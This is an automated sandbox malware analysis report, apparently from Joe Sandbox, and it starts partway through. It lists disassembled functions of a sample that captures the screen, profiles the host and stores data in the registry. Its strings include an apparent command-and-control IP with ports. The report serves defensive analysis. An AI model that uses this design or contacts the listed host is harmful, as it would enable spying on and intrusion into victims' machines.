                                                                                                  • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 02D0E30B
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0E35D
                                                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 02D0E3A4
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 02D0E3D0
                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 02D0E3D7
                                                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 02D0E3E2
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0E400
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 02D0E425
                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 02D0E42C
                                                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 02D0E446
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0E464
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                  • String ID: %4d.%2d.%2d-%2d:%2d:%2d$8.217.85.20$8.217.85.20$8.217.85.20$8.217.85.20$9091$9092$9092$9093$Console$IpDatespecial
                                                                                                  • API String ID: 1511462596-4024211382
                                                                                                  • Opcode ID: e3fde97465f7117c791a6c21527bef4c5ad6499b172544e44349b01761b695aa
                                                                                                  • Instruction ID: b59f08c8b86a80c68a34f8e4a6c1a9b4d31640cf14eed85dc7791e730f7467fc
                                                                                                  • Opcode Fuzzy Hash: e3fde97465f7117c791a6c21527bef4c5ad6499b172544e44349b01761b695aa
                                                                                                  • Instruction Fuzzy Hash: 6BD1B0B0984301AFE320DF64E88AF6A77A5FBD4704F108E2CF59592390DB719D18CB62
                                                                                                  Function 02D0BC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetDesktopWindow.USER32 ref: 02D0BC8F
                                                                                                  • GetDC.USER32(00000000), ref: 02D0BC9C
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 02D0BCA2
                                                                                                  • GetDC.USER32(00000000), ref: 02D0BCAD
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 02D0BCBA
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000076), ref: 02D0BCC2
                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 02D0BCD3
                                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 02D0BCF8
                                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 02D0BD26
                                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 02D0BD78
                                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 02D0BD8D
                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 02D0BDA6
                                                                                                  • SelectObject.GDI32(?,00000000), ref: 02D0BDB4
                                                                                                  • SetStretchBltMode.GDI32(?,00000003), ref: 02D0BDC0
                                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 02D0BDCD
                                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 02D0BDE0
                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 02D0BE07
                                                                                                  • _memset.LIBCMT ref: 02D0BE7A
                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 02D0BE97
                                                                                                  • _memset.LIBCMT ref: 02D0BEAF
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • DeleteObject.GDI32(?), ref: 02D0BF23
                                                                                                  • DeleteObject.GDI32(?), ref: 02D0BF2D
                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 02D0BF39
                                                                                                  • DeleteObject.GDI32(?), ref: 02D0BFDF
                                                                                                  • DeleteObject.GDI32(?), ref: 02D0BFE9
                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 02D0BFF5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                  • String ID: ($6$gfff$gfff
                                                                                                  • API String ID: 3293817703-713438465
                                                                                                  • Opcode ID: afaf36c0f96ffb49552de74180f2c43b158925394a918e9f7244ca47b4e6ba47
                                                                                                  • Instruction ID: 2e6e32bdda1e90ee3ed1019dd4c85952a2709d32e1e96d6fa58c2680f90f0f75
                                                                                                  • Opcode Fuzzy Hash: afaf36c0f96ffb49552de74180f2c43b158925394a918e9f7244ca47b4e6ba47
                                                                                                  • Instruction Fuzzy Hash: 5AD158B1E01218ABDB10DFA5E985B9EBBB9FF58300F104529F905AB390D770AD05CFA1
                                                                                                  Function 02D06A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32(753C73E0), ref: 02D06A94
                                                                                                  • wsprintfW.USER32 ref: 02D06AA7
                                                                                                    • Part of subcall function 02D06910: GetCurrentProcessId.KERNEL32(7A8163DF,00000000,00000000,753C73E0,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06938
                                                                                                    • Part of subcall function 02D06910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06947
                                                                                                    • Part of subcall function 02D06910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06960
                                                                                                    • Part of subcall function 02D06910: CloseHandle.KERNEL32(00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D0696B
                                                                                                  • _memset.LIBCMT ref: 02D06AC2
                                                                                                  • GetVersionExW.KERNEL32(?), ref: 02D06ADB
                                                                                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 02D06B12
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 02D06B19
                                                                                                  • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02D06B3F
                                                                                                  • GetLastError.KERNEL32 ref: 02D06B49
                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 02D06B5D
                                                                                                  • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 02D06B85
                                                                                                  • GetSidSubAuthorityCount.ADVAPI32 ref: 02D06B98
                                                                                                  • GetSidSubAuthority.ADVAPI32(00000000), ref: 02D06BA6
                                                                                                  • LocalFree.KERNEL32(?), ref: 02D06BB5
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D06BC2
                                                                                                  • wsprintfW.USER32 ref: 02D06C1B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                  • String ID: -N/$NO/$None/%s
                                                                                                  • API String ID: 3036438616-3095023699
                                                                                                  • Opcode ID: edb6130a2aba2dd52f4c469fc19912e5b25569efa39856d71c94331d506e5c07
                                                                                                  • Instruction ID: 917b845c26e62dc610d6d994b4beff53473faaa9f9dd8aa31450f3a09d41d159
                                                                                                  • Opcode Fuzzy Hash: edb6130a2aba2dd52f4c469fc19912e5b25569efa39856d71c94331d506e5c07
                                                                                                  • Instruction Fuzzy Hash: 4441A6B0940214AFEB349B60DDC9FEA7B7CEB19714F004495F94696390DB34DEA8CBA1
                                                                                                  Function 02D07490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,753C73E0,?,?,?,02D05611,0000035E,000002FA), ref: 02D0749C
                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 02D074B2
                                                                                                  • swprintf.LIBCMT ref: 02D074EF
                                                                                                    • Part of subcall function 02D07410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,02D07523), ref: 02D0743D
                                                                                                    • Part of subcall function 02D07410: GetProcAddress.KERNEL32(00000000), ref: 02D07444
                                                                                                    • Part of subcall function 02D07410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,02D07523), ref: 02D07452
                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 02D07547
                                                                                                  • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 02D07563
                                                                                                  • RegCloseKey.KERNEL32(000002FA), ref: 02D07586
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,02D05611,0000035E,000002FA), ref: 02D07598
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                  • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                  • API String ID: 2158625971-3190923360
                                                                                                  • Opcode ID: 9c6d39377649fe4ca5dbb43b55be33444ac1f5fa7d36e216e621ef4355084cad
                                                                                                  • Instruction ID: fb42d417e348c77575b5a8dd2d39e2f74e3af860bc12ebf6ec5e2fc8de8ec1be
                                                                                                  • Opcode Fuzzy Hash: 9c6d39377649fe4ca5dbb43b55be33444ac1f5fa7d36e216e621ef4355084cad
                                                                                                  • Instruction Fuzzy Hash: 8D319371A402087BE724DBA4DD89FEFBB7DDF58704F540519BA06A6394EA70DE04C7A0
                                                                                                  Function 02D080F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLogicalDriveStringsW.KERNEL32(000003E8,?,753C73E0,00000AD4,00000000), ref: 02D08132
                                                                                                  • lstrcmpiW.KERNEL32(?,A:\), ref: 02D08166
                                                                                                  • lstrcmpiW.KERNEL32(?,B:\), ref: 02D08176
                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02D081A6
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D081B7
                                                                                                  • __wcsnicmp.LIBCMT ref: 02D081CE
                                                                                                  • lstrcpyW.KERNEL32(00000AD4,?), ref: 02D08204
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 02D08228
                                                                                                  • lstrcatW.KERNEL32(?,00000000), ref: 02D08233
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                  • String ID: A:\$B:\
                                                                                                  • API String ID: 950920757-1009255891
                                                                                                  • Opcode ID: 3fa11bf1270047ea2a0cbc6f4f4a2a81516f6916cb577300580a802fa594078c
                                                                                                  • Instruction ID: cb76931750caabe419fe5efc37b4b5733a4aa3ef1174e198c55cec6c0349b90a
                                                                                                  • Opcode Fuzzy Hash: 3fa11bf1270047ea2a0cbc6f4f4a2a81516f6916cb577300580a802fa594078c
                                                                                                  • Instruction Fuzzy Hash: 03417471E012189BDB20DF64DD84BAEB378EF58714F014599ED0AE3380EB749E09CB94
                                                                                                  Function 02D06790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D05320: InterlockedDecrement.KERNEL32(00000008), ref: 02D0536F
                                                                                                    • Part of subcall function 02D05320: SysFreeString.OLEAUT32(00000000), ref: 02D05384
                                                                                                    • Part of subcall function 02D05320: SysAllocString.OLEAUT32(02D25148), ref: 02D053D5
                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,02D25148,02D069A4,02D25148,00000000,753C73E0), ref: 02D067F4
                                                                                                  • GetLastError.KERNEL32 ref: 02D067FE
                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 02D06816
                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 02D0681D
                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 02D0683F
                                                                                                  • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 02D06871
                                                                                                  • GetLastError.KERNEL32 ref: 02D0687B
                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D068E6
                                                                                                  • HeapFree.KERNEL32(00000000), ref: 02D068ED
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                  • String ID: NONE_MAPPED
                                                                                                  • API String ID: 1317816589-2950899194
                                                                                                  • Opcode ID: ee6cbe3dcf13d7ed11b2d47e791626110de38753e244aa2822f18acfbaab250e
                                                                                                  • Instruction ID: 6df00083839ef9fb9c4563151f9c1b65996bbfa6cd58170dfded959f5e46d5db
                                                                                                  • Opcode Fuzzy Hash: ee6cbe3dcf13d7ed11b2d47e791626110de38753e244aa2822f18acfbaab250e
                                                                                                  • Instruction Fuzzy Hash: 9B4189B1940214AFD7249B64DD88FAE737DEB84700F504598FA09A6380DB709E99CF74
                                                                                                  Function 02D06C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDriveTypeW.KERNEL32(?,76F8DF80,00000000,753C73E0), ref: 02D06C8B
                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 02D06CAA
                                                                                                  • _memset.LIBCMT ref: 02D06CE1
                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 02D06CF4
                                                                                                  • swprintf.LIBCMT ref: 02D06D39
                                                                                                  • swprintf.LIBCMT ref: 02D06D4C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                  • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                  • API String ID: 3202570353-3501811827
                                                                                                  • Opcode ID: 5d6478585a744233b030aad001cc0dbb534733363fec4200393a2a74f6ca7403
                                                                                                  • Instruction ID: b01d2ad1b66416c507b6e214269353c8141ae9b072a41aa838220b9ea94a2a7c
                                                                                                  • Opcode Fuzzy Hash: 5d6478585a744233b030aad001cc0dbb534733363fec4200393a2a74f6ca7403
                                                                                                  • Instruction Fuzzy Hash: B4316DB2E0021C9BDB14CFE4DC85FEEB7B9EB48700F504219E90AA7380DA746D05CB94
                                                                                                  Function 02D06EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateDXGIFactory.DXGI(02D2579C,?,7A8163DF,76F8DF80,00000000,753C73E0), ref: 02D06F4A
                                                                                                  • swprintf.LIBCMT ref: 02D0711E
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D071C7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                  • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                  • API String ID: 3803070356-257307503
                                                                                                  • Opcode ID: 896bbca65c3ee7fa547a4775400e9338560dd504b10490a2252fef1b61ae01bc
                                                                                                  • Instruction ID: 38db817eea96219ada105754310828406840a79d7b5b1887cec4955c6e72d757
                                                                                                  • Opcode Fuzzy Hash: 896bbca65c3ee7fa547a4775400e9338560dd504b10490a2252fef1b61ae01bc
                                                                                                  • Instruction Fuzzy Hash: B6E14371A002259FEB24CE64CCC0BEEB3B5EB49704F1446A9D959AB3D4D770AE41CF91
                                                                                                  Function 02D07410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,02D07523), ref: 02D0743D
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07444
                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,02D07523), ref: 02D07452
                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,02D07523), ref: 02D0745A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                  • API String ID: 3433367815-192647395
                                                                                                  • Opcode ID: b829d7561e9e57b9c8dd634cb4ccd411d1f841746171300968c9cacab7000004
                                                                                                  • Instruction ID: 797068b83e077559363de26f6d90b5362dbcdb717f70f70b0617ffcf3b81ef23
                                                                                                  • Opcode Fuzzy Hash: b829d7561e9e57b9c8dd634cb4ccd411d1f841746171300968c9cacab7000004
                                                                                                  • Instruction Fuzzy Hash: F80128B0E002099FDB54DFB4A944BAEBBF5EB18304F5049A9E909E7340E735DE54CB61
                                                                                                  Function 009754C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263registrymemorysleepCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 427 9754c0-9754d6 428 97580e-975813 427->428 429 9754dc-9754e1 427->429 430 975707-97575f VirtualAlloc call 97c880 call 9767ff 429->430 431 9754e7-97550f RegOpenKeyExW 429->431 452 975761-9757a1 call 97c880 RegCreateKeyW 430->452 453 9757dd-9757ec 430->453 432 975515-975538 RegQueryValueExW 431->432 433 9755ba-9755bf 431->433 435 9755ad-9755b7 RegCloseKey 432->435 436 97553a-975567 call 9767ff call 97c800 RegQueryValueExW 432->436 438 9755c2-9755c8 433->438 435->433 461 9755aa 436->461 462 975569-9755a8 VirtualAlloc call 97c880 436->462 441 9755ca-9755cd 438->441 442 9755e8-9755ea 438->442 443 9755e4-9755e6 441->443 444 9755cf-9755d7 441->444 445 9755ed-9755ef 442->445 443->445 444->442 448 9755d9-9755e2 444->448 449 9755f5-9755fc 445->449 450 9756f8-975702 445->450 448->438 448->443 455 975611-9756d4 call 97c800 * 3 call 9767ff call 97c880 449->455 456 9755fe-97560b VirtualFree 449->456 454 9757ee-97580b call 97721b Sleep call 972d10 450->454 464 9757a3-9757c4 RegDeleteValueW RegSetValueExW 452->464 465 9757ca-9757d5 RegCloseKey call 9772bb 452->465 453->454 473 97580d 454->473 481 9756e6-9756f5 call 97680a 455->481 482 9756d6-9756e3 455->482 456->455 461->435 462->461 464->465 472 9757da 465->472 472->453 473->428 485 9756e4 call 9731e5 482->485 486 9756e4 call 9760df 482->486 485->481 486->481
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 00975507
                                                                                                  • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 0097552E
                                                                                                  • _memset.LIBCMT ref: 00975548
                                                                                                  • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 00975563
                                                                                                  • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 00975586
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009755B1
                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00975605
                                                                                                  • _memset.LIBCMT ref: 00975669
                                                                                                  • _memset.LIBCMT ref: 0097568D
                                                                                                  • _memset.LIBCMT ref: 0097569F
                                                                                                  • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 00975726
                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 00975799
                                                                                                  • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 009757AC
                                                                                                  • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 009757C4
                                                                                                  • RegCloseKey.KERNEL32(?), ref: 009757CE
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 009757FE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                  • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                  • API String ID: 354323817-737951744
                                                                                                  • Opcode ID: 5d329976ac9cb220da50c6e2018fb397afeba0c5b51de52ccb4e2201410c0ea2
                                                                                                  • Instruction ID: 88fb42d77c27719784cc0da7eb344deebbd98964fab121f401696dca14e03310
                                                                                                  • Opcode Fuzzy Hash: 5d329976ac9cb220da50c6e2018fb397afeba0c5b51de52ccb4e2201410c0ea2
                                                                                                  • Instruction Fuzzy Hash: 0591D2B6A00704AFD720DF64DC45FAA77B9FB85700F548158FA0DAB381E7B19A40CBA1
                                                                                                  Function 02D09E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 488 2d09e50-2d09e85 GdipGetImagePixelFormat 489 2d09e87 488->489 490 2d09e8a-2d09eb1 488->490 489->490 491 2d09eb3-2d09ec3 490->491 492 2d09ec9-2d09ecf 490->492 491->492 493 2d09ed1-2d09ee1 492->493 494 2d09eeb-2d09f04 GdipGetImageHeight 492->494 493->494 495 2d09f06 494->495 496 2d09f09-2d09f2c GdipGetImageWidth 494->496 495->496 497 2d09f31-2d09f4e call 2d09c30 496->497 498 2d09f2e 496->498 501 2d09f54-2d09f68 497->501 502 2d0a055-2d0a05a 497->502 498->497 503 2d09f6e-2d09f87 GdipGetImagePaletteSize 501->503 504 2d0a0cf-2d0a0d7 501->504 505 2d0a2a4-2d0a2ba call 2d0f00a 502->505 509 2d09f89 503->509 510 2d09f8c-2d09f98 503->510 507 2d0a20a-2d0a27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 504->507 508 2d0a0dd-2d0a11a GdipBitmapLockBits 504->508 514 2d0a281-2d0a283 507->514 512 2d0a14a-2d0a177 508->512 513 2d0a11c-2d0a121 508->513 509->510 515 2d09fb2-2d09fba 510->515 516 2d09f9a-2d09fa5 call 2d09650 510->516 523 2d0a179-2d0a18e call 2d107f2 512->523 524 2d0a1bf-2d0a1de GdipBitmapUnlockBits 512->524 519 2d0a140-2d0a145 513->519 520 2d0a123 513->520 521 2d0a2a2 514->521 522 2d0a285 514->522 517 2d09fd0-2d09fd5 call 2d01280 515->517 518 2d09fbc-2d09fca call 2d0f673 515->518 516->515 538 2d09fa7-2d09fb0 call 2d1c660 516->538 535 2d09fda-2d09fe5 517->535 518->535 540 2d09fcc-2d09fce 518->540 519->505 528 2d0a12b-2d0a13e call 2d0f639 520->528 521->505 530 2d0a28d-2d0a2a0 call 2d0f639 522->530 544 2d0a200-2d0a205 call 2d01280 523->544 545 2d0a190-2d0a197 523->545 524->514 526 2d0a1e4-2d0a1e7 524->526 526->514 528->519 552 2d0a125 528->552 530->521 546 2d0a287 530->546 542 2d09fe7-2d09fe9 535->542 538->542 540->542 553 2d0a016-2d0a030 GdipGetImagePalette 542->553 554 2d09feb-2d09fed 542->554 544->507 545->544 547 2d0a1f6-2d0a1fb call 2d01280 545->547 548 2d0a1ec-2d0a1f1 call 2d01280 545->548 549 2d0a19e-2d0a1bd 545->549 546->530 547->544 548->547 549->523 549->524 552->528 555 2d0a032-2d0a038 553->555 556 2d0a03b-2d0a040 553->556 559 2d0a00c-2d0a011 554->559 560 2d09fef 554->560 555->556 561 2d0a042-2d0a048 556->561 562 2d0a04a-2d0a050 call 2d0cca0 556->562 559->505 563 2d09ff7-2d0a00a call 2d0f639 560->563 561->562 564 2d0a05f-2d0a063 561->564 562->502 563->559 570 2d09ff1 563->570 568 2d0a0a0-2d0a0c9 call 2d09d80 SetDIBColorTable call 2d0a320 564->568 569 2d0a065 564->569 568->504 571 2d0a068-2d0a098 569->571 570->563 571->571 